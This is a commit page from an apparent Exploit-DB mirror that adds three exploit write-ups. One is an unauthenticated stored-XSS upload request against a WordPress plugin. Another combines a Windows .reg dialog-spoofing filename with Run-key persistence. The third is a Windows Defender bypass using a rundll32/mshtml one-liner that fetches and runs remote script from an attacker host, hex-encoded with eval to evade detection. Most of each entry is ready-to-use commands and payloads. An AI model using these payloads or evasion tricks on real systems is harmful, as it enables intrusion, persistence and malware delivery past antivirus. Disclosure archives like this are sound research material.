bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-01-13

Browse source 
3 changes to exploits/shellcodes

Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass
Microsoft Windows Defender - Detections Bypass

WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
This commit is contained in:
Offensive Security 2022-01-13 05:01:58 +00:00
parent 6a94460ed6
commit 00e20a3a1c
4 changed files with 454 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

118
exploits/php/webapps/50655.txt Normal file
View file

@ -0,0 +1,118 @@
# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
# Date: 10/01/2022
# Exploit Author: Veshraj Ghimire
# Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/
# Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/
# Version: 1.3.2
# Tested on: Windows 10 - Chrome, WordPress 5.8.2
# CVE : CVE-2021-24563
# References:
https://www.youtube.com/watch?v=lfrLoHl4-Zs
https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1
# Description:
The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly
# Proof Of Concept:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------124662954015823207281179831654
Content-Length: 1396
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_ID"
1247
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_title"
test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_content"
test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="files[]"; filename="xss.html"
Content-Type: text/html
<script>alert(/XSS/)</script>
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="action"
upload_ugc
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_layout"
image
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="fu_nonce"
021fb612f9
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/frontend-uploader-form/
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="ff"
92b6cbfa6120e13ff1654e28cef2a271
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_post_id"
1247
-----------------------------124662954015823207281179831654--
Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html

215
exploits/windows/local/50653.txt Normal file
View file

@ -0,0 +1,215 @@
# Exploit Title: Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec
[Vendor]
www.microsoft.com
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.
[Vulnerability Type]
Windows .Reg File Dialog Spoof - Mitigation Bypass
[CVE Reference]
N/A
[Security Issue]
Back in 2019 I disclosed a novel way to spoof the Windows registry dialog warning box to display an attacker controlled message.
This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes to abort" or
whatever else an attacker would like to display.
This flaw can potentially make users think they are canceling the registry import when they are in fact importing it, as we can make the
registry security warning dialog box LIE to them as the warning messages are now under an attacker's control.
The way it works is using a specially crafted .Reg filename, this allows control of the registry warning dialog message presented to an end user.
Recently, I noticed in 2022 .Reg file dialog spoof no longer works on Windows 10, but instead triggers an access violation in Regedit.exe.
Therefore, something has changed in the OS, possibly a silent mitigation hmmm. Wouldn't be the first time, back in 2016 my msinfo32.exe
.NFO file XXE injection vulnerability report had a similar fate, fixed with no CVE or bulletin and that one allowed remote file access data theft.
In an threatpost.com interview in 2019, Microsoft stated "The issue submitted does not meet the severity bar for servicing via a security update"
Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711
However, the "fix" is easily bypassed and the old payload can still be made to work across systems.
Bypassing .Reg spoofing fix was only the start, I had to find ways to bypass two different Windows Defender detections along the way for the PoC.
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427
Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426
Lets begin...
My original .Reg file spoofing payload of 2019, now triggers an access violation and crashes regedit.exe from invalid pointer read.
00007FFE7A4A7C83 | EB 0D | jmp ntdll.7FFE7A4A7C92 |
00007FFE7A4A7C85 | FF C9 | dec ecx | ;This loops thru to read in the path + filename
00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE
00007FFE7A4A7C8C | 74 08 | je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes
00007FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
00007FFE7A4A7C92 | 85 C9 | test ecx,ecx
00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7
ntdll!woutput_l+0x387:
00007ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:000001ed`00000000=????
========================================================================================================================================
Online search shows Win-7 still makes up about 22% of the world's computers, so I ask my friend Security researcher Eduardo Braun Prado (Edu_Braun_0day)
to help me re-test the .REG file spoof on Windows 7 for completeness. Turns out my original payload still works on Win-7 and with minor tweaks on Win-10.
Original works on Win-7, but crashes regedit.exe on Win-10:
Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg
Original payload (first mitigation bypass) works Win-7/Win-10:
Remove second to last byte (%1) before the %0 string terminator and %b characters Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg
New payload mitigation bypass works on both Win-7 and Win-10:
Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg
However, we are NOT done yet as we must deal with Windows Defender detection preventions.
1) Trojan:Win32/Powessere.G
2) Backdoor:JS/Relvelshe.A
Bypassing "Trojan:Win32/Powessere.G"
=====================================
Two components required to defeat Trojan:Win32/Powessere.G detection in Windows Defender.
A) extra path traversal when referencing mshtml ..\\..\\..\\
B) concatenation when constructing the remote server URL scheme "script"+":"+"http.
FAIL on current updated Windows 10
C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.
SUCCESSFUL on current updated Windows 10
Using an extra ..\ results in a bypass, but does nothing useful just an alert box.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(1)
Trying to download and execute remote code using the payload below fails again, as we need the second component URL scheme concat.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.45/hi.tmp")
Access is denied.
Jscript concatenation of the URL scheme.
document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")
Successfully bypasses "Trojan:Win32/Powessere.G" detection!
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")
Final hurdle we face, Windows defender detects the below downloaded file named "backdoor" as Backdoor:JS/Relvelshe.A and removes it from INetCache.
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\backdoor[1]"
File "backdoor" contents.
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
Bypassing "Backdoor:JS/Relvelshe.A" detection.
==============================================
The way we do this is to Hex encode our PoC code new ActiveXObject("WScript.Shell").Run("calc.exe")
Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function.
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
Done!, successfully bypassed the .Reg spoof mitigation and two Windows Defender detections. Long Live Windows .Reg file dialog spoofing Flaw!
[References]
Original advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
https://threatpost.com/windows-bug-spoof-dialog-boxes/142711/
[Mitigation Bypass, New PoC Video URL]
https://www.youtube.com/watch?v=QANX45jieoo
[Exploit/PoC/2022]
Note: The circa 2019 advisory exploit abused "Image File Execution Options" to store the payload as a debugger setting for MSIE.
Unfortunately, that no longer works, so we will make do for now with storing the payload on disk in a .cmd file and registry Run key.
1) Create a .Reg Dialog Spoofing file named, Sales_Report_2022.%n%nClick YES to cancel%0.reg with below contents
OR use the original payload with minor alterations. Sales_Report_2022.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg
I prefer the original because the % characters help obscure the obvious wording in the filename.
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"HATE"="C:\\dump\\s.cmd"
2) Create a Windows .cmd file, "s.cmd", with below contents. Unfortunately, it needs to be stored on disk using the path as referenced in the .Reg file above,
update server IP as required.
rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://192.168.1.45/hi.tmp")
3) Create the remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell.
<?xml version="1.0"?>
<component>
<script>
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
</script>
</component>
4) Logout and log back into Windows, BOOM calc.exe runs!
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Original Vendor Notification: March 1, 2019
Original MSRC Response: " A registry file was created with the title you suggested, but the error message was clear."
Then vendor sent me a link pointing me to the "Definition of a Security Vulnerability".
March 10, 2019 : Public Disclosure
Vendor Notification:
January 10, 2022 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

118
exploits/windows/local/50654.txt Normal file
View file

@ -0,0 +1,118 @@
# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together
machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in
your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your
device and in the cloud.
[Vulnerability Type]
Windows Defender Detection Bypass
TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A
[CVE Reference]
N/A
[Security Issue]
Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml.
C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.
Pass an extra "..\" to the path.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)
Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp").
However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
Access is denied.
Full bypass E.g.
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
Enter, Backdoor:JS/Relvelshe.A detection.
Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it hits InetCache.
"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"
However, this is easily bypassed by Hex encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe").
Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function.
[References]
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427
Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426
Advisory:
https://twitter.com/hyp3rlinx/status/1480651583172091904
[Exploit/PoC]
1) Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection.
python -m http.server 80
"hi.tmp"
<?xml version="1.0"?>
<component>
<script>
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
</script>
</component>
2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
BOOM!
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
January 10, 2022 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

3
files_exploits.csv
View file

@ -11430,6 +11430,8 @@ id,file,description,date,author,type,platform,port
50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
50642,exploits/windows/local/50642.ps1,"Automox Agent 32 - Local Privilege Escalation",1970-01-01,"Greg Foss",local,windows,
50650,exploits/windows/local/50650.py,"VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)",1970-01-01,"Bryan Leong",local,windows,
50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows,
50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44732,3 +44734,4 @@ id,file,description,date,author,type,platform,port
50648,exploits/php/webapps/50648.txt,"Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
50649,exploits/php/webapps/50649.txt,"Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Zachary Asher",webapps,php,
50651,exploits/php/webapps/50651.txt,"Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Dominic Clark",webapps,php,
50655,exploits/php/webapps/50655.txt,"WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Veshraj Ghimire",webapps,php,

Can't render this file because it is too large.